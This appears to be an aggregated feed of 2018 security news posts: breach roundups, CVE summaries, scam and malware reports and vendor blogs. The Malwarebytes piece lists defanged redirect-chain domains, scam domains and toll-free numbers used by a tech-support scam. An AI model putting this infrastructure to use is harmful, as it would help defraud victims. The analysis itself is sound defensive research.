To read this article in full, please click here

Top five biggest data breaches of 2017

The previous year has been marked by the largest data breaches in the history of cybersecurity. Hardly a week went by without news that some company had exposed and leaked consumer and commercial data. In fact, according to the Breach Level Index (BLI,) 1454 organizations in various industries failed to safeguard their databases, resulting in the entirety of their user’s information being exposed for all to see. And all this happened in 2017 alone.

To help put all this in perspective, we’ll recap the five most recent, and notable, data breaches in America, and the consequences to which they’ve led. Each of the following data breaches has a “risk score,” based on many factors: financial loss, the amount of sensitive information lost, and the damage it caused to the company in question, its customers, and its partners. The following data breach ratings are presented in descending order.


Headquarters: Atlanta, Georgia, United States

July 12, 2017
Risk Score: 10.0
143 million records

Equifax, one of the three major credit reporting agencies, suffered a massive data breach in mid-May through July 2017. If you have a credit report, there’s a good chance you’re one of the 143 million Americans whose sensitive personal information was exposed in this Equifax data breach. During the attack, malicious outsiders managed to steal data containing people’s names, Social Security Numbers, birth dates, addresses, and in many cases, driver’s license numbers. They also hacked credit card numbers for 209,000 people, and dispute documents with personal identifying information for about 182,000 people.

River City Media

Headquarters: Jackson, Wyoming, United States

June 3, 2017

Risk Score: 9.8

1.3 billion records

River City Media, a huge email marketing organization, failed to safeguard backups of its database containing 1.3 billion email accounts. Besides emails, the database included users’ real names, IP addresses, and often physical address. River City Media used the following personal data in its spam email campaign. In the emails, the company promised “credit checks, education opportunities, and sweepstakes.” There’s a risk that your personal data, or the data of someone you know, was made public.

Deep Root Analytics/ Republican National Committee

Headquarters: Arlington, Virginia, United States

June 13, 2017

Risk Score: 9.6

198 million records

Deep Root Analytics, a marketing company working for the Republican National Committee, inadvertently left sensitive personal details for roughly 62% of the US population on a public domain. The data breach was named the largest breach of electoral data in the United States to date. Along with information about 200 million US citizens’ home addresses, birthdates, phone numbers and political views, the breach also included analyses used by political groups to predict where individual voters fall on controversial issues such as gun ownership, stem cell research and abortion rights. The data was placed on a public Amazon cloud server and could be accessed and downloaded by anyone with a link.


Headquarters: Irvine, California, United States

December 19, 2017

Risk Score: 9.4

123 million records

Alteryx, a California based marketing and analytics firm, accidentally left an unsecured database online, exposing sensitive information for about 123 million U.S. households.  The personal details included street addresses, demographics, and family finances, as well as information pertaining to home and auto ownership, and even specifics about children in the household. The database was accessible to anyone with an Amazon Web Services account, the storage service Alteryx used to host the files.

Center for Election Systems at Kennesaw State University

Headquarters: Kennesaw, Georgia, United States

March 3, 2017

Risk Score: 9.1

7.5 million records

During a breach of the Kennesaw State University (KSU) Center for Election Systems, sensitive data on Georgia’s 6.7 million voters was exposed to potential hackers, and remained accessible for months. The data included Social Security Numbers, party affiliation, and birthdates — as well as passwords used by county officials to access election management files. The center was notified about the possible vulnerabilities in August 2016, however, didn’t take the necessary security measures rectify the problem.

What if my personal data was exposed?

There’s literally thousands of data breaches we could discuss, but we chose the biggest breaches that could potentially affect you, your family, and your friends. With that in mind, we urge you to take a moment and visit OneRep.com and see exactly which websites are posting information about you online. OneRep’s service has proved itself invaluable to many customers and is a “must have” for anyone who cares about their online privacy and security. OneRep can automatically remove your name, address, credit history, birthdate, and other information from the Internet, and their ongoing privacy protection continually monitors the internet for relisted records and removes them on your behalf. We also recommend to try OneRep 5-day free trial plan which includes the Internet scanning, removal of your personal information from 62 people-search websites and premium support.

The post Top five biggest data breaches of 2017 appeared first on TechWorm.

‘World of Warcraft’ cyberattacker sentenced to year in prison

One World of Warcraft player is paying the price for taking a virtual rivalry too far. A US federal court has sentenced Romanian man Calin Mateias to spend a year in federal prison after he pleaded guilty to launching a distributed denial of service attack against WoW's servers in response to being "angered" by one player. The 2010 traffic flood knocked thousands of players offline and cost Blizzard $30,000 (which Mateias repaid in April) in recovery expenses.

Source: NBC Los Angeles

The US Is Unprepared for Election-Related Hacking in 2018

This survey and report is not surprising:

The survey of nearly forty Republican and Democratic campaign operatives, administered through November and December 2017, revealed that American political campaign staff -- primarily working at the state and congressional levels -- are not only unprepared for possible cyber attacks, but remain generally unconcerned about the threat. The survey sample was relatively small, but nevertheless the survey provides a first look at how campaign managers and staff are responding to the threat.

The overwhelming majority of those surveyed do not want to devote campaign resources to cybersecurity or to hire personnel to address cybersecurity issues. Even though campaign managers recognize there is a high probability that campaign and personal emails are at risk of being hacked, they are more concerned about fundraising and press coverage than they are about cybersecurity. Less than half of those surveyed said they had taken steps to make their data secure and most were unsure if they wanted to spend any money on this protection.

Security is never something we actually want. Security is something we need in order to avoid what we don't want. It's also more abstract, concerned with hypothetical future possibilities. Of course it's lower on the priorities list than fundraising and press coverage. They're more tangible, and they're more immediate.

This is all to the attackers' advantage.

Facebook is working on an ad-free subscription-based version

Are you ready for an ad-free Facebook experience?

Facebook has been conducting a market research among its consumers for an ad-free subscription version of the social network to see if they’d be interested in paying for their privacy, according to Bloomberg.

As per rumors in the past, Facebook has considered the idea of paid- subscription before as well, however, this time there’s more internal momentum to pursue it, which is mainly because the company is facing a crisis of public trust after the Cambridge Analytica privacy scandal.

It is a known fact that Facebook has been the leading platform for social media advertising and marketing due to its enormous online audience and high user engagement rates. The majority of the social network’s revenues are generated through advertising targeted with this user data.

Now, that consumer sentiment is changing and with mounting evidence that its huge user base is reaching saturation due to this insecurity about their privacy, Zuckerberg & Co. merely might be looking to diversify beyond its one-trick revenue policy. And that includes an ad-free iteration.

Though Facebook declined to comment on subscription-based ad-free service. Yet in recent weeks, one of the company’s highest-ranking executive has left open the possibility of a subscription option. During the company’s first-quarter earnings call last week, Chief Operating Officer Sheryl Sandberg said the company has “certainly thought about lots of other forms of monetization including subscriptions, and we’ll always continue to consider everything.”

Also, during his testimony to Congress, The chief executive Mark Zuckerberg told the lawmakers that there would “always be a version of Facebook that is free,” as the site says, “it’s free and always will be.”

The post Facebook is working on an ad-free subscription-based version appeared first on TechWorm.

Top 10 Trending Keywords in .Com and .Net Registrations in April

With more than 300 million domain names registered globally, there are numerous examples of trending keywords reflected by domain name registrations. We have shown in the past that there is a correlation between domain name registrations and newsworthy and popular events, as well as anticipated trends.

Keeping in the spirit of the zeitgeist that .com and .net domain name registration trends can represent, Verisign publishes this monthly blog post series identifying the top 10 trending .com and .net keywords registered in English during the preceding month.


Here are the top 10 trending keywords registered in April 2018. Any surprises?



funeral base
lazy  pen
holo  accident
 realtor attorney
 hainan  marijuana
 regenerative  child
 locations michigan
bankruptcy gulf
 cerveza pest
 ballistic  christ

Click here to see other domain trends blog posts, and make sure you check back the second Tuesday of each month for the latest keyword registration trends in .com and .net. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Note: Each list was developed by examining keyword registration growth relative to the preceding month, such that those keywords with the highest percentage of registration growth are being reported on. This method is used to eliminate commonly registered keywords, such as “online” and “shop,” to provide a true look at monthly trends. In order to be included, a keyword must experience a minimum threshold in registration growth month over month. Qualifying keywords with the highest volume of registrations are then ranked and included in the list.

The post Top 10 Trending Keywords in .Com and .Net Registrations in April appeared first on Verisign Blog.

A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking

Since hackers have started exploiting two recently disclosed unpatched critical vulnerabilities found in GPON home routers, security researchers have now released an unofficial patch to help millions of affected users left vulnerable by their device manufacturer. Last week, researchers at vpnMentor disclosed details of—an authentication bypass (CVE-2018-10561) and a root-remote code execution

IDG Contributor Network: How consumer omnichannel authentication benefits businesses

Consumers' rising expectations for an omnichannel experience are driving innovations in user authentication methods. From a business perspective, the idea of switching over to new authentication methods can be hard to swallow. After all, security is not a profit center. But the cost-benefit reality of omnichannel authentication is more nuanced; the innovative methods that are transforming consumers’ authentication experiences also benefit the business with:

  • Improved security posture
  • Less technology to manage
  • Happier customers

Authentication trends and changing user expectations

Many enterprises are already working to introduce omnichannel authentication experiences for customers. For example, a bank may think in terms of the different channels through which it interacts with consumers and strive to apply a common set of security layers for:

To read this article in full, please click here

CVE-2018-1248 (authentication_manager)

RSA Authentication Manager Security Console, Operation Console and Self-Service Console, version 8.3 and earlier, is affected by a Host header injection vulnerability. This could allow a remote attacker to potentially poison HTTP cache and subsequently redirect users to arbitrary web domains.

CVE-2018-1247 (authentication_manager)

RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application.

Tech support scam uses fake Shoppers Stop to draw from thousands of forced ad injections

These days, there are a lot of browser locker campaigns fueled by malvertising or redirection from hacked sites. But the Shoppers Stop tech scam campaign is actually a bit of both, using compromised sites injected with advertising code that redirects users to other threats, including tech support scams, via malvertising.

We believe those ad injections came from pirated CMS themes. Normally, these are WordPress themes that people typically have to pay to download. Instead, they are offered for free, with a bonus bundle of malicious code.

One aspect we noticed as part of the redirection mechanism was an online shopping portal registered to domains with suspicious TLDs such as .trade, .accountant, .ml that quickly rotate to make blacklisting approaches futile. However, using that same artifact, we were able to flag other browser locker incidents for this particular campaign.

The browlock

The browser locker used in this campaign is a spin-off of the Google Chrome Safebrowing warning. The scammers have added scare tactics to it (e.g. Hard Drive Safety Delete Starting in: 5:00 minutes), as well as authentication pop-ups that prevent the user from closing the browser tab or window.

In this template, the crooks have not bothered with changing the IP address (supposedly of their victim), which still belongs to the original creator of that page, located somewhere in India. The toll-free number, dynamically populated both on the page and the URL, is what the scammers hope potential victims will dial.


As mentioned earlier, the number one vector of traffic to these browser locker pages is advertising—more precisely, malvertising. Perpetrators can spend a small budget and attract a fair amount of visits through one of many ad networks. More and more, we are seeing ad platforms ensure that visitors are legitimate and not bots or others using anonymous proxies.

In some cases, this ‘lead funneling’ is doubled by the use of a traffic distribution system (TDS). Here’s an example we captured via the well-documented BlackTDS, redirecting users to ad networks and eventually to the browlock.

BlackTDS has been the source of many browser lockers that have been caught by other researchers as well. For example, on March 29, Vitali Kremez reported an infection chain to a browlock started via smarttraffics[.]ml.

Another instance of the same threat was found as part of an ongoing campaign of compromised websites injected with ad network code. There have been reports from site owners since late last year, but the trend has increased recently.

Denis Sinegubko from Sucuri noted that an ad script with the same ID was injected into over 2,000 websites and drew the conclusion that this was not a case of webmasters using ads for monetization, but rather unwanted ad injections into their CMS. Using the Source Code Search Engine PublicWWW, we found thousands of websites with the same ad codes:

For several weeks now, we have reproduced numerous infection chains to exploit kits, browlocks, and other scams via those injected ads.


The server side PHP code (WP-VCD malware) used to load those ads can be seen below. Thanks to our friends at Sucuri for sharing it.

Sucuri’s SiteCheck detects these server-side injections as rogueads.unwanted_ads. The leading cause for these injections are Nulled themes, pirated copies of paid-for CMS themes. The free lunch often comes with backdoors, lack of future updates, and of course violating licensing and copyright laws.

In the following traffic capture (thanks Baber Pervez), we notice the ad injection leading to a malicious redirection chain via the following sequence:

  • dreams-al[.]com (Compromised site)
    • oclasrv[.]com (PropellerAds ad network)
      • deloton[.]com (PropellerAds ad network)
        • xml.adhunter[.]media (XML feed)
          • updating23001.accountant (Shoppers Stop Redirector)
            • techno59033.download (Browlock)

We have observed the same pattern (or similar pattern) from many sites that had been injected with the ad code snippet.


The redirector page acts as a gateway to the browser locker. On the surface, it is an online shopping store called Shoppers Stop, offering merchandise for men and women. Shoppers Stop is also the name of a well-known Indian department store chain with over 83 outlets across the country. We believe the scammers may have been using that name to set up either a fake online store or a demo (many scammers are also into website design).


This domain is itself a clone of goshopper[.]info, which was registered via privacy protection on 2017-10-27 and is now parked:

However, in these malicious redirections, the online shopping site is purely used as a redirection mechanism, which is done in such a way that victims will not actually view any of the content. The redirection is done via 301 redirect, also known as a permanent redirect, typically used for SEO purposes by website owners that have moved their property to another (permanent) location.

location: https://techno59033[.]download/TollFree1-877-670-2749

Performing a search on the address provided in the contact page gives us a lead about a .com domain called e-storekart[.]com created on November 7, 2017. While there may not seem to be anything special about it (it is yet another clone), its whois information provides us a bit more information than the other domains we had cataloged before.


This domain was one of the few Shoppers Stop templates that didn’t have a completely anonymized whois. Querying on the string bhushan, we identified multiple other domains ranging from support sites for printers, help with email, web design, fashion, and more. Many of those domains no longer exist or have already been parked.

But even inactive domains can provide some valuable information. For example, we retrieved an archived copy of antivirustechies[.]us that shows it used to be a “legitimate” tech support page for several different antivirus products.

However, the legitimacy of this company was quickly undermined after a few searches for its phone number. It is associated with many complaint reports indicating that people were cold called with the usual scare tactics (fake Microsoft support):

Additional evidence comes in the form of a browser-locker template with that exact phone number on a page hosted at palmreader[.]website/1-800-245-9970/. If you recall, the browser locker depicted at the beginning of this article is very much the same. The URL contains the phone number in its path, and the fake Safebrowsing template is similar as well.

The registration date for that domain goes back to late August 2017. A couple of other phone numbers are also used here, and hardcoded in the URI path, rather than being generated via an API on-the-fly.

To summarize, the same scammer group that used the Shoppers Stop template late last year has already registered a tech support domain (antivirustechies[.]us) and a phone number with the same type of browser locker as used in their Shoppers Stop campaign.

While it can be tricky to link threats based on material that could have been stolen from others, this information can also be helpful in discovering interesting connections to additional web properties associated with fraudulent activities.

The Shoppers Stop tech support scam is among the top campaigns we are tracking (trailing just behind the .TK and .CLUB campaigns). It’s getting a lot of traffic leads from a large number of sites that have been injected with ads, on top of its other malvertising chains.

Malwarebytes users are protected against this threat thanks to domain blocks on oclasrv[.]com and deloton[.]com. We have also reported the advertising IDs we were able to collect to PropellerAds, and the malicious redirector domains/browlocks to CloudFlare.

Indicators of compromise

A list of the domains used for the browser lockers can be found here.

The post Tech support scam uses fake Shoppers Stop to draw from thousands of forced ad injections appeared first on Malwarebytes Labs.

You, Your Company, and BYOD: A Love Triangle

BYOD, or bring your own device, has become the new normal in the corporate workplace. But with this convenience comes impending security concerns. Although BYOD costs companies less, mobile devices are often used without proper security measures in place. This makes it difficult for employers to determine how much access employees should receive to company networks. The more access an employee has to company networks, the more opportunities for not only their personal information becoming vulnerable, but company data as well. With BYOD becoming more prevalent in the workplace, it is vital companies and employees understand the perks and security concerns that are associated with BYOD and take necessary steps to ensure personal devices and company information is protected.

BYOD can offer some really great perks: 1) employers spend less on technology and providing devices to employees thus saving the company money and 2) you get to use your own device(s) with which you are already accustomed to. Your company may already allow BYOD in your office, but do you know the associated security risks? They are complicated. Three looming concerns of BYOD that companies and employees should be addressing are accessibility to company data, lost or stolen devices, and overall maintenance. Let’s delve into why these concerns are the most pressing.

  1. Accessibility. The overarching question of BYOD is who gets access to company data on their personal devices, when and where? For example, if you are at a meeting, outside of the office and you are on a limited-access BYOD policy with your employer, you would only be able to access work email and contact but nothing stored on the company servers. If your client asks to see a specific document hosted on your company server during the meeting, you won’t be able to access it because it is sensitive and lives on the private severs. This is where BYOD backfires for the employee.
  2. Lost or stolen devices. A personal device that contains confidential company information poses a huge security threat if it is lost or stolen, and begs the question: who is responsible for retrieving the device and/or data? What is the proper response to this sort of breach? It is your personal device, with both personal and company data, so should it be locked, tracked and retrieved, or completely wiped immediately? There is no clear or correct answer, which is why companies need a clear BYOD policy and culture of security that fits both parties’ needs.
  3. Maintenance and malware. Frequency of device maintenance, software updates and uniformed app downloads can open the door to a slew of security vulnerabilities. Organizations have a hard-enough time implementing their own software across the corporate network, let alone ensuring all employees are adhering to the required software updates from device operating systems and applications. With the breadth of different phones and tablets being used around the globe, it can be nearly impossible to keep track of employees’ security posture on their personal devices.

Without the right security measures in place, there is the possibility of malware being downloaded through sketchy apps or unpatched versions of software, which could be transferred onto corporate servers depending on the employee’s access level. McAfee Labs detected over 16 million mobile malware infestations in the third quarter of 2017 alone, nearly doubling the number one year previously. This uptick in cyberattacks on mobile devices illustrates the importance of comprehensive cybersecurity policies across the board.

So how do you protect yourself when it comes to using your smartphone or tablet for both business and pleasure? Here are a few tips:

  • Practice discretion when alternating between personal and business tasks on your mobile device. Separate the two by using different, verified apps for company and personal uses to maintain safety.
  • Avoid downloading apps from third-party vendors that could make your device prone to malware, and always check permissions of any apps before downloading, particularly those that ask for to access to your device’s data.
  • Regularly update your device to ensure they are equipped with vital patches that protect against flaws and bugs that cybercriminals can exploit.
  • Avoid accessing data-sensitive apps on your device over public Wi-Fi. Cybercriminals could use this as an opportunity to take a look at your mobile data.
  • Keep your personal and work information secure with comprehensive mobile security, such as McAfee® Mobile Security, that will not only scan your device for viruses and threats but also help you identify apps that are accessing too much of your valuable personal information.

McAfee is the device-to-cloud cybersecurity company helping to secure data at all levels, on all devices. We’re helping you stop threats and protect your data wherever it resides, from your fingertips to the skies, enabling you to protect what matters on your digital journey.

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post You, Your Company, and BYOD: A Love Triangle appeared first on McAfee Blogs.

Weekly Threat Intelligence Brief: May 8, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Senator John McCain wrote in his new book that America should seriously consider a cyberattack to retaliate for Russia’s meddling in U.S. elections, to send a strong message to the superpower. The book, titled “The Restless Wave” and scheduled for a May 22 release, also touches on accusations that Russia could have compromising material related to U.S. President Donald Trump and confirms that McCain has reviewed a copy of the Steele dossier, opposition research authored by an ex-British spy that includes salacious allegations about Trump and his alleged ties to Russia.”

 –Defense News


“Twitter revealed that a bug caused the platform to store user passwords in an unmasked form meaning that it is possible that Twitter stored plain text passwords openly without any hashing on an internal log. Twitter notes that it currently has “no reason to believe password information ever left Twitter’s system” or that these unprotected passwords were accessed by hackers, but the risk of the unknown remains. The company has advised users to change their passwords as a precautionary measure. At this time, Twitter declined to provide additional technical details on the incident but emphasized that it believes the likelihood that the passwords were discoverable is “extremely low” and an internal investigation has revealed no indications of a breach or other misuse.”

Risk Takers

Information Security Risk

“A bank in Australia lost the personal financial histories of 12 million customers, and chose not to reveal the breach to consumers, in one of the largest financial services privacy breaches ever to occur in Australia. The nation’s largest bank lost the banking statements for customers from 2004 to 2014 after a subcontractor lost several tape drives containing the financial information in 2016. While the bank initially notified the Office of the Australian Information Commissioner (OAIC) of the breach shortly after it became aware of it in 2016, a spokesperson for the OAIC said it was now making further inquiries into the privacy breach, following a damning report into the bank’s culture. The breach occurred in 2016 when the bank’s subcontractor Fuji Xerox was decommissioning a data storage center where some Bank customer data was stored.”


Operational Risk

“A new spam campaign designed to infect victims with GandCrab ransomware has surged, as the criminals behind the scheme look to infect as many victims as possible. Analysis by researchers at a security company found that three new samples of GandCrab 2.1 are being distributed as the payload in a single mass spam campaign. “This means that newly created samples are being pushed simultaneously, possibly with different configurations, or simply in an attempt to evade specific file signatures,” said researchers. Tens of thousands of GandCrab spam emails are being distributed each day, with mail servers hosted in the US representing the most common target by far, accounting for three quarters of deliveries. When it comes to successful infections, the US currently accounts for the fourth largest percentage of victims, behind Peru, Chile and India.”


The post Weekly Threat Intelligence Brief: May 8, 2018 appeared first on LookingGlass Cyber Solutions Inc..

New WhatsApp message can crash your app and phone

A bug is being forwarded via WhatsApp messages which when tapped, could send not just the Android app crashing but possibly even the entire Android device as well, the media reported.

"As with any message bomb, it involves sending and receiving a specially crafted message with hidden symbols in-between spaces. Tapping on a portion of the text will basically make the app 'expand' the hidden symbols, potentially overloading the app and even the OS," SlashGear reported on Sunday (May 6).

"There seem to be two variants of this WhatsApp message being forwarded. One involves an ominous black dot that comes with a warning on what will happen if you tap on it which most curious cats will do anyway," the report added.
“If you touch the black point then your WhatsApp will hang”. The line is followed by a 'Black dot' in the next line and the words "t-touch here". Upon touching the black icon, the app freezes. As per reports, the message uses an RLM (right-to-left mark) as opposed to WhatsApp's Left-to-Right format, which causes the app to crash. The message is said to affect both Android and iOS.

Another "message bomb" which is causing the messaging platform to crash is more "nefarious, looks too innocent" and does not come with a warning. The message includes special characters followed by an emoji that do not display visibly but are used to change text behaviour. The message, containing the text "This is very interesting!" is followed by a crying laughing emoji at the end. As per a Reddit user, the message is so heavy that it is crashing the smartphone upon copying and pasting on another chat box. The string of characters, leading to the enormous size of the message is what is expected to be crashing the app.

The problem of WhatsApp being crashed by some forwarded messages has been experienced since long, with such messages repeatedly taking new forms. Such messages or "message bombs" are not limited to Android. Even iMessage is not immune to bugs that could send the app crashing.

WhatsApp has not commented on the potentially disruptive bug so far.

FBI Has Received Over Four Million Internet Crime Complaints Since 2000

The FBI has received a total of more than four million Internet crime complaints from users since the year 2000. According to its Internet Crime Complaint Center (IC3) 2017 Internet Crime Report, the Bureau received its four millionth Internet crime complaint on 12 October 2017. Users submitted tens of thousands of additional reports in the […]… Read More

The post FBI Has Received Over Four Million Internet Crime Complaints Since 2000 appeared first on The State of Security.

How Microsoft Edge’s hidden WDAG browser lets you surf the web securely

Occasionally, for whatever reason, we browse parts of the web we know could be dangerous, where malicious pop-ups, ransomware or other malware could infect our PCs. While no solution is totally safe, Microsoft now has a free, specialized version of its Edge browser specifically designed to protect you online: Windows Device Application Guard, or WDAG.

WDAG was originally developed for Windows 10 Enterprise, protecting companies with billions of dollars at stake. Now that same protection has migrated to Windows 10 Pro—sorry, Windows 10 Home users—as an optional feature that you can turn on within Windows, for free. It debuted on Windows 10 Pro as part of the April 2018 Update

To read this article in full, please click here

Getting grounded in IoT networking and security

(Insider Story)

Who wants to go threat hunting?

I’ve been a lot of things in my professional career including paramedic, accountant, computer trainer, PC/network technician, VP of IT, consultant and writer. The most enjoyable job I ever had was penetration tester. You get paid to break into places, work with cool people, and learn a lot. Best of all, if you couldn’t break into a place, the customer would be delighted and brag about how their computer security defenses didn’t fall to a sustained hacking test. 

Interruptions Are Bad – Business Security Weekly #84

This week, Michael and Paul interview Senior Attorney, Elizabeth Wharton! In the Article Discussion, the work required to have an opinion, why email is so stressful, productivity, and more! In Tracking Security Innovation, we have updates from Carbon Black, Trusted Key, Namogoo, IronNet Cybersecurity, and more on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode84


Visit https://www.securityweekly.com/bsw for all the latest episodes!

Understanding the Role of Multi-Stage Detection in a Layered Defense

The cybersecurity landscape has changed dramatically during the past decade, with threat actors constantly changing tactics to breach businesses’ perimeter defenses, cause data breaches, or spread malware. New threats, new tools, and new techniques are regularly chained together to pull off advanced and sophisticated attacks that span across multiple deployment stages, in an effort to be as stealthy, as pervasive, and as effective as possible without triggering any alarm bells from traditional security solutions.

Security solutions have also evolved, encompassing multi-stage and multi-layered defensive technologies aimed at covering all potential attack vectors and detecting threats at pre-execution, on-execution, or even throughout execution.

Multi-Stage Detection

All malware is basically code that’s stored (on disk or in memory) and executed, just like any other application. Delivered as a file or binary, security technologies refer to these states of malware detection as pre-execution and on-execution. Basically, it boils down to detecting malware before, or after, it gets executed on the victim’s endpoint.

Layered security solutions often cover these detection stages with multiple security technologies specifically designed to detect and prevent zero-day threats, APTs, fileless attacks and obfuscated malware from reaching or executing on the endpoint.

For example, pre-execution detection technologies often include signatures and file fingerprints matched against cloud lookups (local and cloud-based machine learning models aimed at ascertaining the likelihood that an unknown file is malicious based on similarity to known malicious files), as well as hyper detection technologies, which are basically machine learning algorithms on steroids.

It helps to think that hyper detection technologies are basically paranoid machine learning algorithms for detecting advanced and sophisticated threats at pre-execution, without taking any chances. This is particularly useful for organizations in detecting potentially advanced attacks, as it can inspect and detect malicious commands and scripts - including VB scripts, JAVA scripts, PowerShell scripts, and WMI scripts – that are usually associated with sophisticated fileless attacks.

On-execution security technologies sometimes involve detonating the binary inside a sandboxed environment, letting it execute for a specific amount of time, then analyzing all system changes the binary made, the internet connections it attempted, and pretty much inspect any changes and behavior the binary had on the system after it was executed. A sandbox analyzer is highly effective as there’s no risk of infecting a production endpoint and the security tools used to analyze the binary can be set to a highly paranoid mode. The trade-off is that this would typically cause performance penalties on a production endpoint, and even risk compromising the organization’s network should the threat actually breach containment.

Of course, there are on-execution technologies that are deployed on endpoints to specifically detect and prevent exploits from occurring or for monitoring the behavior of running applications and processes throughout their entire lifetime. These technologies are designed to constantly assess the security status of all running applications, and prevent any malicious behavior from compromising the endpoint.

Layered Security Defenses

Multi-stage detection using layered security technologies gives security teams the unique ability to stop the attack kill chain at almost any stage of attack, regardless of the threat’s complexity. For instance, while a tampered document that contains a malicious Visual Basic script might bypass an email filtering solution, it will definitely be picked up by a sandbox analyzer technology as soon as the script starts to execute malicious instructions or commands, or starts to connect to and download additional components on the endpoint.

It’s important to understand that the increased sophistication of threats requires security technologies capable of covering multiple stages of attack, creating a security mesh that acts as a safety net to protect your infrastructure and data. However, it’s equally important that all these security layers be managed from a centralized console that offers a single pane of glass visibility into the overall security posture of the organization. This makes managing security aspects less cumbersome, while also helping security and IT teams focus on implementing prevention measures rather than fighting alert fatigue.

About the author: Liviu Arsene is a Senior E-Threat analyst for Bitdefender, with a strong background in security and technology. Reporting on global trends and developments in computer security, he writes about malware outbreaks and security incidents while coordinating with technical and research departments.

Copyright 2010 Respective Author at Infosec Island

Two Romanian Hackers Extradited to the U.S. Over $18 Million Vishing Scam

Two Romanian hackers have been extradited to the United States to face 31 criminal charges including computer fraud and abuse, wire fraud conspiracy, wire fraud, and aggravated identity theft. Described as "international computer hackers" by the United States Department of Justice, Teodor Laurentiu Costea, 41, and Robert Codrut Dumitrescu, 40, allegedly rob Americans of more than $18 million

Twitter is Testing End-to-End Encrypted Direct Messages

Twitter has been adopting new trends at a snail's pace. But it’s better to be late than never. Since 2013 people were speculating that Twitter will bring end-to-end encryption to its direct messages, and finally almost 5 years after the encryption era began, the company is now testing an end-to-end encrypted messaging on Twitter. Dubbed "Secret Conversation," the feature has been spotted in

CVE-2018-10809 (2345_security_guard)

In 2345 Security Guard 3.7, the driver file (2345NetFirewall.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x00222040. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-8873.

CVE-2018-10806 (frogcms)

An issue was discovered in Frog CMS 0.9.5. There is a reflected Cross Site Scripting Vulnerability via the file[current_name] parameter to the admin/?/plugin/file_manager/rename URI. This can be used in conjunction with CSRF.

Tripwire Survey: Most RSAC Attendees Favor Shorter Vulnerability Disclosure Timelines

With continued debate around responsible disclosure and increased attention around security research techniques, Tripwire wanted to get a pulse on what the community considers responsible practices today. In surveying 147 attendees at the RSA Conference in San Francisco a couple weeks ago, we found out a number of interesting perspectives. Most respondents favored shorter timelines […]… Read More

The post Tripwire Survey: Most RSAC Attendees Favor Shorter Vulnerability Disclosure Timelines appeared first on The State of Security.

Happy National Teacher Appreciation Day!

Today is National Teacher Appreciation Day. How are you celebrating?

At Verisign, we did a quick search on NameStudioTM, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!




What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio and check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National Teacher Appreciation Day!

*Available as of May 8, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National Teacher Appreciation Day! appeared first on Verisign Blog.